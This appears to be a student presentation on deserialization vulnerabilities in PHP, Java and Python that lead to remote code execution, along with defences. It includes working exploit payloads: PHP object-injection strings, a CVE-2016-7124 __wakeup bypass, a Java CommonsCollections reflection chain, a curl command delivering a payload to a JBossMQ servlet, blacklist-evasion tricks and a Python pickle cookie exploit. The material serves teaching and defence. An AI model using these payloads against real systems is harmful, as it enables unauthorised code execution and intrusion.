Why so serialize ?
From Deserialization to RCE
Group 7, Mercury, 10175101282
Batman: The Dark Knight
Concepts
Remote Code Execution
-
Code Execution
- PHP
- Python
- Java
- OS (e.g. cmd, powershell, sh)
- Remote
- via Internet
(De)Serialization
-------- --------
| | ---- Serialize ---> | |
| Object | | Bytes |
| | <--- Deserialize ---- | |
-------- --------RFC 1014
Persistence
Transmission
Serialized Data in PHP
O:1:"A":2:{s:3:"one";i:1;s:3:"two";a:3:{i:0;s:5:"apple";i:1;s:4:"pear";i:2;s:6:"banana";}}<?php
class A {
public $one = 1;
public $two = array('apple', 'pear', 'banana');
}
$b = new A();
echo serialize($b);
?>Serialize Data in Java
import java.io.Serializable;
class TestSerial implements Serializable {
public byte version = 100;
public byte count = 0;
} Serialized Data in Java
AC ED 00 05 73 72 00 0A 53 65 72 69 61 6C 54 65
73 74 A0 0C 34 00 FE B1 DD F9 02 00 02 42 00 05
63 6F 75 6E 74 42 00 07 76 65 72 73 69 6F 6E 78
70 00 64 hex form:
Serialized Data in Python
>>> import pickle
>>> data = {'apple': 1, 'pear': 2, 'banana': 4}
>>> pickle.dumps(data)
b'\x80\x04\x95#\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x05apple\x94K\x01\x8c\x04pear\x94K\x02\x8c\x06banana\x94K\x04u.'Why Dangerous ?
PHP Deserialization
First attempt
<?php
class merc {
var $test = '123';
}
$object = new merc();
$data = serialize($object);
$new_object = unserialize($data);
?>O:4:"merc":1:{s:4:"test";s:3:"456";}Magic Functions
-
__construct()
- new Object() ✔
- unserialize() ×
- __destruct()
- __toString()
- __call()
- __wakeup()
- ...
Why using magic ?
- Call functions manually ×
- Able to control
- attributes ✔
- member functions ×
- Call other objects' member functions
Searching for evil functions
<?php
class merc {
public $test;
function __construct() {
$this->test = new L();
}
function __destruct() {
$this->test->goodbye();
}
}
class L {
function goodbye() {
echo "Bye~";
}
}
Searching for evil functions
class Evil {
var $bye_message;
function goodbye() {
eval($this->bye_message);
}
}
unserialize($_GET['test']);http://url/?test=O:4:"merc":1:{s:4:"test";O:4:"Evil":1:{s:11:"bye_message";s:10:"phpinfo();";}}eval() is evil !!!
Searching for evil functions
<?php
class merc {
public $test;
function __construct() {
$this->test = new Evil();
}
}
class Evil {
var $bye_message = "phpinfo();";
}
$object = new merc();
echo serialize($object);phpinfo()
With protection
<?php
class convent {
var $warn = "No hacker.";
function __destruct() {
eval($this->warn);
}
function __wakeup() {
foreach(get_object_vars($this) as $k => $v) {
$this->$k = null;
}
}
}
unserialize($_POST[cmd]);CVE-2016-7124
Bypassing __wakeup()
cmd=O:7:"convent":2:{s:4:"warn";s:10:"phpinfo();";}PHP 5.x < 5.6.25, 7.x < 7.0.10
POP chain
Property-Oriented Programing
A::__destruct()
|
--> B::goodbye() --> safe
|
--> C::goodbye()
|
--> D::foo() × No such function!
|
v
D::__call()
|
--> E::bar()
|
--> ... --> ✔ vulnerable!Conclusion
$data not sanitized in unserialize($data)
Defending: Always sanitize $data !
(NOT enough)
Advanced Topics
- POP chain
- phar://
- Session Deserialization
- String Escape
- Object Escape
- SoapClient + Deserialization = SSRF
- Exception + Deserialization = XSS
no need for unserialize() !
Java Deserialization
Interfaces & Methods
| Interface | java.io.Serializable |
| Serialize | ObjectOutputStream::writeObject() |
| Deserialize | ObjectOutputStream::readObject() |
Ideal Scenario
public class Evil implements Serializable{
public String cmd;
private void readObject(java.io.ObjectInputStream stream) throws Exception {
stream.defaultReadObject();
Runtime.getRuntime().exec(cmd);
}
}Reflection
- retrieve info of Class/Object dynamically
- java.lang.Class
- ClassObject
Handy
∝
Dangerous
Example
public class User {
private String name;
public User(String name) {
this.name=name;
}
public void setName(String name) {
this.name=name;
}
public String getName() {
return name;
}
}Creating the ClassObject
Class.forName("reflection.User") // method 1
User.class // method 2
new User().getClass() // method 3Accessing Attributes
Class UserClass = Class.forName("reflection.User");
Constructor constructor = UserClass.getConstructor(String.class);
User user = (User) constructor.newInstance("mercury");
Field field = UserClass.getDeclaredField("name");
field.setAccessible(true);
field.set(user, "merc");Accessing Methods
Class UserClass = Class.forName("reflection.User");
Constructor constructor = UserClass.getConstructor(String.class);
User user = (User) constructor.newInstance("mercury");
Method method = UserClass.getDeclaredMethod("setName", String.class);
method.invoke(user, "merc");Executing Code
// java.lang.Runtime.getRuntime().exec("calc.exe");
Class runtimeClass = Class.forName("java.lang.Runtime");
// getRuntime() is static
Object runtime = runtimeClass.getMethod("getRuntime").invoke(null);
runtimeClass.getMethod("exec", String.class).invoke(runtime, "calc.exe");Over-complicated ?
- More choice in attacking
- Easier to bypass restrictions
Blacklist: Runtime
java.lang.Runtime.getRuntime() ×
"getRu" + "ntime" ✔
new String("Z2V0UnVudGltZQ==").Base64Decode() ✔
Real Vulnerabilties
Websphere
Jboss
Weblogic
Spring
Jenkins
Struts
OpenNMS
Jackson
Fastjson
JMeter
Shiro
CVE-2017-7504
JBossMQ JMS <= 4.x
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.javajava -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1 "calc.exe"curl http://ip:port/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1.serJavaDeserH2HC
commons-collections-3.2.1.jar
ExampleCommonsCollections1.java
vuln lib
exploit code
ExampleCommonsCollections1.ser
payload
Exploit with Reflection
Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer(
"getMethod",
(new Class[] {String.class, Class[].class }),
(new Object[] {"getRuntime", new Class[0] })
),
((Runtime)Runtime.class.getMethod("getRuntime", new Class[0]).invoke(null, new Object[0])).exec(cmd[]);
Exploit with Reflection
new InvokerTransformer(
"invoke",
(new Class[] {Object.class, Object[].class}),
(new Object[] {null, new Object[0]})
),
new InvokerTransformer(
"exec",
new Class[] { String[].class },
new Object[]{ cmd }
)
};Tools
marshalsec & ysoserial
POP chains
Locating Vulns
- Source Code
- Entrypoints
- Libraries
- implements Serializable
- Network Traffic
- AC ED 00 05 ==base64==> rO0AB
- RMI / JMX
CommonsCollections
Entrypoints
ObjectInputStream.readObject
ObjectInputStream.readUnshared
XMLDecoder.readObject
Yaml.load
XStream.fromXML
ObjectMapper.readValue
JSON.parseObject
...Defending
- Sanitize
- Tools
- Whitelisting
SerialKiller
contrast-rO0
Hooking resolveClass()
@Override
protected Class<?> resolveClass(ObjectStreamClass desc) {
if (!desc.getName().equals(User.class.getName())) {
throw new InvalidClassException(
"Unauthorized unserialization attempt",
desc.getName());
}
return super.resolveClass(desc);
}Higher-level ?
Python Deserialization
Serialization Lib
third-party lib
pickle
-------- --------
| | ---- pickle.dumps() ---> | |
| Object | | Bytes |
| | <--- pickle.loads() ---- | |
-------- --------Scenarios
Redis
MongoDB
Memcached
pickle.loads(...)
Session
RCE
Back to Magic Functions
__reduce__()
PVM
I've never seen this class, how to (de)serialize it ?
It's easy, just:
(os.system, ('/bin/sh',))
Web Application
@app.route("/")
def index():
try:
user = base64.b64decode(request.cookies.get('user'))
user = pickle.loads(user)
username = user["username"]
except:
username = "Guest"
return "Hello %s" % usernameExploit
import os
import pickle
import requests
import base64
class test(object):
def __reduce__(self):
return (os.system,('whoami',))
a = test()
payload = pickle.dumps(a)
cookies = dict(user=base64.b64encode(payload).decode('utf-8'))
response = requests.get("http://127.0.0.1:5000", cookies=cookies)The rest ?
Advanced Topics
- Serializing functions
- PVM opcode
- Bypassing whitelist
- Unserializing other format e.g. JSON
Sandbox Escaping
DXP
Data eXchange Protocol
XML
<?xml version="1.0" encoding="UTF-8"?>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>JSON
{
"name": "Tom",
"Grade":1,
"age":11,
"gender": "M"
}Data eXchange Protocol
Protobuf
Thrift
Hessian
......
Trend
- Language-independent
- faster
- safer
- less redundant info
Why safer?
{
"name": "Tom",
"Grade":1,
"age":11,
"gender": "M"
}What is data is data.
Flexibility
∝
1 / Security
Security Issues
XML
JSON
XXE / XMLDecoder
Jackson / Fastjson
Binary
Heap Overflow
Replace ?
Serialization
DXP
Application Level
Language Level
Conclusion
References
1. https://tools.ietf.org/html/rfc1014
2. https://juejin.im/post/6844903765921808397
3. https://www.iteye.com/blog/longdick-458557
4. https://python3-cookbook.readthedocs.io/zh_CN/latest/c05/p21_serializing_python_objects.html
5. https://www.k0rz3n.com/2018/11/19/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E6%B7%B1%E5%85%A5%E7%90%86%E8%A7%A3PHP%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/#1-%E6%A6%82%E5%BF%B5%E8%A7%A3%E9%87%8A%EF%BC%9A
6. https://xz.aliyun.com/t/7570
7. https://xz.aliyun.com/t/6787
8. https://xz.aliyun.com/t/2041
9. https://github.com/frohoff/ysoserial
10. https://github.com/mbechler/marshalsec
11. https://github.com/joaomatosf/JavaDeserH2HC
12. https://github.com/ikkisoft/SerialKiller
13. https://misakikata.github.io/2020/04/python-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/#pickle
14. https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BPython%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/
15. http://hengyunabc.github.io/thinking-about-grpc-protobuf/
16. https://vulhub.org/#/environments/jboss/CVE-2017-7504/